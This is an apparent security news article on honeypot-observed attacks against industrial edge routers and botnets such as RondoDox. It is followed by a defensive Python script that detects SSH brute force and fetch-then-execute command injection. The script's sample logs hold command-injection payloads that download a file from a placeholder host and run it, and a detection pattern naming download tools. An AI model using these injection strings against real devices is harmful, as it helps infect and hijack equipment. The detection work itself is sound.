Perimeter Under Siege: 60 Million Attacks Target Industrial Edge Routers in 90-Day Surge
Over a three-month observation period, Forescout researchers recorded more than 60 million malicious requests against devices at the edge of industrial networks. Honeypot data showed a clear pattern: perimeter devices that are internet-facing by design, such as industrial routers and firewalls, are attacked far more often than systems that are only incidentally reachable from the internet. These edge assets alone accounted for nearly two-thirds of all observed malicious activity.
Most requests targeted SSH and Telnet, where automated credential stuffing and brute-force logins were the primary threat. HTTP and HTTPS traffic, nearly a quarter of the activity, was largely associated with vulnerability exploitation attempts and the delivery of malicious payloads.
Among the most prominent emerging threats were the RondoDox and ShadowV2 botnets. RondoDox, first detected only in May, already leverages more than 50 exploits, some of them for flaws that have no public identifier. ShadowV2 appeared later and is also gaining momentum quickly. Both rely on the same tactic: injecting commands that make a vulnerable device download a malicious binary.
Particular attention was drawn to an activity cluster dubbed Chaya_005. Its behavior is atypical: the HTTP requests carry malformed exploits and parameters that do not match the targeted devices, yet taken together they show an intent to elicit a response from potentially vulnerable systems. This does not resemble standard botnet behavior; it may instead be a reconnaissance phase that builds a target list for later use, whether for malware delivery, cryptomining, or proxy deployment.
Chaya_005 has been active for at least two years. Its early activity focused on exploiting a known vulnerability in Sierra Wireless routers, but over time the group shifted to other devices and address ranges. Notably, some IP addresses reappeared at roughly one-year intervals, and no malicious binaries were ultimately delivered—circumstantial evidence suggesting a preparatory or research-oriented campaign. Furthermore, the IP addresses involved showed no signs of broader compromise or participation in typical malicious activity.
While it cannot be entirely ruled out that Chaya_005 is linked to a research entity rather than a purely malicious actor, such a scenario appears unlikely. According to the report’s authors, the greatest risk stems from attempts to exploit routers that have reached end of support. One such example is the LS300 model, which has not received security updates since 2021, with the phase-out of 3G networks further diminishing its relevance. Nevertheless, devices of this type remain in use across industrial environments.
The authors stress that as IT and OT environments become increasingly intertwined, threats can no longer be neatly categorized as either “informational” or “operational.” A previous incident in Denmark’s energy sector—where companies were forced into isolated operating modes—was triggered by the compromise of edge routers originally deployed for IT purposes. Such cases are not isolated; similar infrastructure weaknesses persist across Europe.
To mitigate these risks, experts recommend identifying all network-connected devices, changing default credentials, disabling unused services, isolating OT assets from the public internet, and deploying monitoring solutions capable of detecting intrusion attempts and anomalous behavior.
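As an added example (not code from the Forescout report or from this article), the following Python script shows the kind of monitoring the last recommendation calls for, applied to the two attack patterns described earlier: it counts failed SSH logins per source address to flag brute-force sources, and it decodes HTTP request URLs to flag command injection that fetches a remote file and then runs it, the common shape of the botnets' download tactic. The log lines, hostnames, URL paths, IP addresses (RFC 5737 documentation ranges) and the threshold of five failures are all constructed or assumed for illustration.

```python
"""Flag SSH brute-force sources and download-and-execute command injection
in router-style logs. Added example; sample data below is constructed."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sshd log lines (not real traffic). 203.0.113.7 hammers the
# device with failed logins; 192.0.2.20 is an operator with one typo.
SSH_LOG = """\
Jan 12 10:00:01 edge-rtr sshd[2101]: Failed password for root from 203.0.113.7 port 51234 ssh2
Jan 12 10:00:02 edge-rtr sshd[2102]: Failed password for admin from 203.0.113.7 port 51235 ssh2
Jan 12 10:00:02 edge-rtr sshd[2103]: Invalid user support from 203.0.113.7 port 51236
Jan 12 10:00:03 edge-rtr sshd[2104]: Failed password for invalid user support from 203.0.113.7 port 51236 ssh2
Jan 12 10:00:04 edge-rtr sshd[2105]: Failed password for root from 203.0.113.7 port 51237 ssh2
Jan 12 10:00:05 edge-rtr sshd[2106]: Failed password for admin from 203.0.113.7 port 51238 ssh2
Jan 12 10:07:44 edge-rtr sshd[2130]: Failed password for ops from 192.0.2.20 port 40100 ssh2
Jan 12 10:07:50 edge-rtr sshd[2131]: Accepted publickey for ops from 192.0.2.20 port 40100 ssh2
""".splitlines()

# Constructed access-log lines. The CGI paths are hypothetical; the first two
# carry URL-encoded shell commands that fetch a file and execute it.
HTTP_LOG = """\
203.0.113.9 - - [12/Jan/2025:10:05:00 +0000] "GET /cgi-bin/cmd?run=wget%20http%3A%2F%2F198.51.100.5%2Fa.sh%20-O-%7Csh HTTP/1.1" 404 0
203.0.113.9 - - [12/Jan/2025:10:05:01 +0000] "GET /cgi-bin/exec?cmd=cd+/tmp;wget+http://198.51.100.5/b;chmod+777+b;./b HTTP/1.1" 404 0
198.51.100.77 - - [12/Jan/2025:10:06:12 +0000] "POST /api/config HTTP/1.1" 404 0
192.0.2.44 - - [12/Jan/2025:10:06:30 +0000] "GET /cgi-bin/status?device=edge-rtr&ifname=eth0 HTTP/1.1" 200 512
""".splitlines()

# sshd reports both plain and "invalid user" failures with this prefix.
FAILED_LOGIN = re.compile(
    r"Failed password for (?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3})"
)
# Common-log-format prefix: client IP, two ignored fields, timestamp, request line.
ACCESS_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')
# Heuristic: a fetch tool, then a separator, then execution or chmod.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^;|&]*"   # fetch a remote file ...
    r"(?:;|\||&&|\s)\s*"                       # ... followed by a separator ...
    r"(?:sh\b|bash\b|chmod\b|\./)",            # ... and execution of the result
    re.IGNORECASE,
)


def failed_logins_by_source(lines):
    """Count sshd 'Failed password' events per source IP."""
    counts = Counter()
    for line in lines:
        match = FAILED_LOGIN.search(line)
        if match:
            counts[match.group(2)] += 1
    return counts


def ssh_bruteforce_sources(lines, threshold=5):
    """Return {ip: failures} for sources at or above the failure threshold.

    The threshold is an assumption; a production detector would also bound
    the time window rather than counting over the whole file.
    """
    return {ip: n for ip, n in failed_logins_by_source(lines).items() if n >= threshold}


def download_exec_requests(lines):
    """Return (ip, decoded_request_target) for URLs carrying a fetch-then-run chain."""
    hits = []
    for line in lines:
        match = ACCESS_LINE.match(line)
        if not match:
            continue
        ip, _method, target = match.groups()
        decoded = unquote_plus(target)  # attackers encode spaces, pipes, slashes
        if DOWNLOAD_EXEC.search(decoded):
            hits.append((ip, decoded))
    return hits


if __name__ == "__main__":
    for ip, n in ssh_bruteforce_sources(SSH_LOG).items():
        print(f"SSH brute-force source: {ip} ({n} failed logins)")
    for ip, target in download_exec_requests(HTTP_LOG):
        print(f"download-and-execute attempt from {ip}: {target}")
```

The two detectors are deliberately independent of any vendor path or CVE, since RondoDox is reported to use exploits without public identifiers: matching on the post-exploitation behavior (fetch, then run) catches the delivery stage regardless of which flaw opened the door. Decoding the URL before matching matters, because the same `wget ... | sh` chain arrives percent-encoded in real requests.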